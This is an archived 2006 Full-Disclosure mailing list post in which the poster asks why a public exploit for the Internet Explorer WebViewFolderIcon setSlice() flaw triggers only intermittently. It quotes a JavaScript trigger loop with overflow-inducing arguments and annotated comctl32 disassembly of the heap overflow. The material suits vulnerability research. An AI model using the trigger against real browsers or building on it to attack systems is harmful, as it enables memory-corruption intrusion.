lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 23 Nov 2006 18:06:22 +0800
From: ". Solo" <soloaway@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Regarding WebViewFolderIcon setSlice() Exploit

Hi, all

some question puzzled me.

 the exploit http://www.milw0rm.com/exploits/2448

In assembly code, it allco 0 bytes first, and then we can tell It overflow
through the "rep movsd  " in ".text:780AA731". In fact, It is required that
the edi must be set to the place we alloc of 0 byte, if we want to trigger
the vulnerability.

But most of time it can not be triggered.

I saw the exploit invoked the setSlice repeatly, yet sometimes it can be
triggered through the long "FOR" repeat. I can not find the reason why it
can be triggered if just repeat and repeat, what is it happan to make the
edi to the point of 0byte,

Thanks for your help

    for ( i = 0 ; i < 128 ; i++)
{
try{
var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505 );
}catch(e){}
}




.text:780AA6F1                 mov     ecx, [ebx+10h]          ; ecx =
00000002
.text:780AA6F4                 add     eax, ecx                    ; eax =
80000000
.text:780AA6F6                 cdq                                      ;
edx = FFFFFFFF
.text:780AA6F7                 idiv    ecx                             ; eax
= C000000 (edx = 00000000)
.text:780AA6F9                 mov     esi, eax                    ; esi =
C0000000
.text:780AA6FB                 mov     eax, [ebx+0Ch]         ; eax =
00000010 ([00eaeb34])
.text:780AA6FE                 imul    esi, ecx
.text:780AA701                 imul    eax, esi
.text:780AA704                 push    eax                           ;
uBytes
.text:780AA705                 push    dword ptr [ebx+4]       ; hMem
.text:780AA708                 call    comctl32__ReAlloc       ; Alloc 0
Byte
.text:780AA70D                 test    eax, eax                     ; eax is
the point to the place of "0Byte"
.text:780AA70F                 jz      short loc_780AA73D
.text:780AA711                 mov     [ebx+4], eax
.text:780AA714                 mov     eax, [esp+0Ch+arg_4] ; eax = 7fffffff
.text:780AA718                 mov     [ebx+8], esi                ; [ebx+8]
= 80000000
.text:780AA71B
.text:780AA71B loc_780AA71B:                           ; CODE XREF:
comctl32__DSA_SetItem+1D.j
.text:780AA71B                 mov     [ebx], edi                   ; [ebx]
= edi = 7fffffff
.text:780AA71D
.text:780AA71D loc_780AA71D:                           ; CODE XREF:
comctl32__DSA_SetItem+15.j
.text:780AA71D                 mov     ecx, [ebx+0Ch]
.text:780AA720                 mov     esi, [esp+0Ch+arg_8] ; esi = "DCBA",
arg_8
.text:780AA724                 mov     edi, ecx
.text:780AA726                 imul    edi, eax
.text:780AA729                 add     edi, [ebx+4]
.text:780AA72C                 mov     eax, ecx
.text:780AA72E                 shr     ecx, 2
.text:780AA731                 rep movsd                        ;copy esi to
edi,but the edi is not always be the place we alloc 0byte.
.text:780AA733                 mov     ecx, eax
.text:780AA735                 and     ecx, 3
.text:780AA738                 xor     eax, eax
.text:780AA73A                 rep movsb
.text:780AA73C                 inc     eax
.text:780AA73D
.text:780AA73D loc_780AA73D:                           ; CODE XREF:
comctl32__DSA_SetItem+3D.j
.text:780AA73D                 pop     edi
.text:780AA73E                 pop     esi
.text:780AA73F                 pop     ebx

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists